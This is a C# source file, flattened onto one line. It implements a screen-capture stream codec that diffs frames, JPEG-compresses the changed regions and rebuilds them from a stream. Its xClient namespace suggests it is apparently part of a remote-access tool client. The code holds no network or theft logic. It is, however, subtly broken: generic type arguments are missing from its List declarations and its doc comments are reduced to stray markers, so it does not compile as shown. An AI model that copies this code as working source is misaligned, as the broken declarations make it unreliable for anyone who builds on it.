using System; using System.Collections.Generic; using System.Drawing; using System.Drawing.Imaging; using System.IO; using xClient.Core.Compression; namespace xClient.Core.Utilities { public class UnsafeStreamCodec : IDisposable { public int Monitor { get; private set; } public string Resolution { get; private set; } public Size CheckBlock { get; private set; } public int ImageQuality { get { return _imageQuality; } private set { lock (_imageProcessLock) { _imageQuality = value; if (_jpgCompression != null) { _jpgCompression.Dispose(); } _jpgCompression = new JpgCompression(_imageQuality); } } } private int _imageQuality; private byte[] _encodeBuffer; private Bitmap _decodedBitmap; private PixelFormat _encodedFormat; private int _encodedWidth; private int _encodedHeight; private readonly object _imageProcessLock = new object(); private JpgCompression _jpgCompression; ///

/// Initialize a new instance of UnsafeStreamCodec class. ///

/// The quality to use between 0-100. /// The monitor used for the images. /// The resolution of the monitor. public UnsafeStreamCodec(int imageQuality, int monitor, string resolution) { this.ImageQuality = imageQuality; this.Monitor = monitor; this.Resolution = resolution; this.CheckBlock = new Size(50, 1); } public void Dispose() { Dispose(true); // Tell the Garbage Collector to not waste time finalizing this object // since we took care of it. GC.SuppressFinalize(this); } protected virtual void Dispose(bool disposing) { if (disposing) { if (_decodedBitmap != null) { _decodedBitmap.Dispose(); } if (_jpgCompression != null) { _jpgCompression.Dispose(); } } } public unsafe void CodeImage(IntPtr scan0, Rectangle scanArea, Size imageSize, PixelFormat format, Stream outStream) { lock (_imageProcessLock) { byte* pScan0 = (byte*)scan0.ToInt32(); if (!outStream.CanWrite) { throw new Exception("Must have access to Write in the Stream"); } int stride = 0; int rawLength = 0; int pixelSize = 0; switch (format) { case PixelFormat.Format24bppRgb: case PixelFormat.Format32bppRgb: pixelSize = 3; break; case PixelFormat.Format32bppArgb: case PixelFormat.Format32bppPArgb: pixelSize = 4; break; default: throw new NotSupportedException(format.ToString()); } stride = imageSize.Width * pixelSize; rawLength = stride * imageSize.Height; if (_encodeBuffer == null) { this._encodedFormat = format; this._encodedWidth = imageSize.Width; this._encodedHeight = imageSize.Height; this._encodeBuffer = new byte[rawLength]; fixed (byte* ptr = _encodeBuffer) { byte[] temp = null; using (Bitmap tmpBmp = new Bitmap(imageSize.Width, imageSize.Height, stride, format, scan0)) { temp = _jpgCompression.Compress(tmpBmp); } outStream.Write(BitConverter.GetBytes(temp.Length), 0, 4); outStream.Write(temp, 0, temp.Length); NativeMethods.memcpy(new IntPtr(ptr), scan0, (uint)rawLength); } return; } if (this._encodedFormat != format) { throw new Exception("PixelFormat is not equal to previous Bitmap"); } else if (this._encodedWidth != imageSize.Width || this._encodedHeight != imageSize.Height) { throw new Exception("Bitmap width/height are not equal to previous bitmap"); } long oldPos = outStream.Position; outStream.Write(new byte[4], 0, 4); long totalDataLength = 0; List blocks = new List(); Size s = new Size(scanArea.Width, CheckBlock.Height); Size lastSize = new Size(scanArea.Width % CheckBlock.Width, scanArea.Height % CheckBlock.Height); int lasty = scanArea.Height - lastSize.Height; int lastx = scanArea.Width - lastSize.Width; Rectangle cBlock = new Rectangle(); List finalUpdates = new List(); s = new Size(scanArea.Width, s.Height); fixed (byte* encBuffer = _encodeBuffer) { var index = 0; for (int y = scanArea.Y; y != scanArea.Height; y += s.Height) { if (y == lasty) { s = new Size(scanArea.Width, lastSize.Height); } cBlock = new Rectangle(scanArea.X, y, scanArea.Width, s.Height); int offset = (y * stride) + (scanArea.X * pixelSize); if (NativeMethods.memcmp(encBuffer + offset, pScan0 + offset, (uint)stride) != 0) { index = blocks.Count - 1; if (blocks.Count != 0 && (blocks[index].Y + blocks[index].Height) == cBlock.Y) { cBlock = new Rectangle(blocks[index].X, blocks[index].Y, blocks[index].Width, blocks[index].Height + cBlock.Height); blocks[index] = cBlock; } else { blocks.Add(cBlock); } } } for (int i = 0; i < blocks.Count; i++) { s = new Size(CheckBlock.Width, blocks[i].Height); for (int x = scanArea.X; x != scanArea.Width; x += s.Width) { if (x == lastx) { s = new Size(lastSize.Width, blocks[i].Height); } cBlock = new Rectangle(x, blocks[i].Y, s.Width, blocks[i].Height); bool foundChanges = false; uint blockStride = (uint)(pixelSize * cBlock.Width); for (int j = 0; j < cBlock.Height; j++) { int blockOffset = (stride * (cBlock.Y + j)) + (pixelSize * cBlock.X); if (NativeMethods.memcmp(encBuffer + blockOffset, pScan0 + blockOffset, blockStride) != 0) { foundChanges = true; } NativeMethods.memcpy(encBuffer + blockOffset, pScan0 + blockOffset, blockStride); //copy-changes } if (foundChanges) { index = finalUpdates.Count - 1; if (finalUpdates.Count > 0 && (finalUpdates[index].X + finalUpdates[index].Width) == cBlock.X) { Rectangle rect = finalUpdates[index]; int newWidth = cBlock.Width + rect.Width; cBlock = new Rectangle(rect.X, rect.Y, newWidth, rect.Height); finalUpdates[index] = cBlock; } else { finalUpdates.Add(cBlock); } } } } } for (int i = 0; i < finalUpdates.Count; i++) { Rectangle rect = finalUpdates[i]; int blockStride = pixelSize * rect.Width; Bitmap tmpBmp = null; BitmapData tmpData = null; long length; try { tmpBmp = new Bitmap(rect.Width, rect.Height, format); tmpData = tmpBmp.LockBits(new Rectangle(0, 0, tmpBmp.Width, tmpBmp.Height), ImageLockMode.ReadWrite, tmpBmp.PixelFormat); for (int j = 0, offset = 0; j < rect.Height; j++) { int blockOffset = (stride * (rect.Y + j)) + (pixelSize * rect.X); NativeMethods.memcpy((byte*)tmpData.Scan0.ToPointer() + offset, pScan0 + blockOffset, (uint)blockStride); //copy-changes offset += blockStride; } outStream.Write(BitConverter.GetBytes(rect.X), 0, 4); outStream.Write(BitConverter.GetBytes(rect.Y), 0, 4); outStream.Write(BitConverter.GetBytes(rect.Width), 0, 4); outStream.Write(BitConverter.GetBytes(rect.Height), 0, 4); outStream.Write(new byte[4], 0, 4); length = outStream.Length; long old = outStream.Position; _jpgCompression.Compress(tmpBmp, ref outStream); length = outStream.Position - length; outStream.Position = old - 4; outStream.Write(BitConverter.GetBytes(length), 0, 4); outStream.Position += length; } finally { tmpBmp.UnlockBits(tmpData); tmpBmp.Dispose(); } totalDataLength += length + (4 * 5); } outStream.Position = oldPos; outStream.Write(BitConverter.GetBytes(totalDataLength), 0, 4); } } public unsafe Bitmap DecodeData(IntPtr codecBuffer, uint length) { if (length < 4) { return _decodedBitmap; } int dataSize = *(int*)(codecBuffer); if (_decodedBitmap == null) { byte[] temp = new byte[dataSize]; fixed (byte* tempPtr = temp) { NativeMethods.memcpy(new IntPtr(tempPtr), new IntPtr(codecBuffer.ToInt32() + 4), (uint)dataSize); } this._decodedBitmap = (Bitmap)Bitmap.FromStream(new MemoryStream(temp)); return _decodedBitmap; } else { return _decodedBitmap; } } public Bitmap DecodeData(Stream inStream) { byte[] temp = new byte[4]; inStream.Read(temp, 0, 4); int dataSize = BitConverter.ToInt32(temp, 0); if (_decodedBitmap == null) { temp = new byte[dataSize]; inStream.Read(temp, 0, temp.Length); this._decodedBitmap = (Bitmap)Bitmap.FromStream(new MemoryStream(temp)); return _decodedBitmap; } using (Graphics g = Graphics.FromImage(_decodedBitmap)) { while (dataSize > 0) { byte[] tempData = new byte[4 * 5]; inStream.Read(tempData, 0, tempData.Length); Rectangle rect = new Rectangle(BitConverter.ToInt32(tempData, 0), BitConverter.ToInt32(tempData, 4), BitConverter.ToInt32(tempData, 8), BitConverter.ToInt32(tempData, 12)); int updateLen = BitConverter.ToInt32(tempData, 16); byte[] buffer = new byte[updateLen]; inStream.Read(buffer, 0, buffer.Length); using (MemoryStream m = new MemoryStream(buffer)) { using (Bitmap tmp = (Bitmap)Image.FromStream(m)) { g.DrawImage(tmp, rect.Location); } } dataSize -= updateLen + (4 * 5); } } return _decodedBitmap; } } }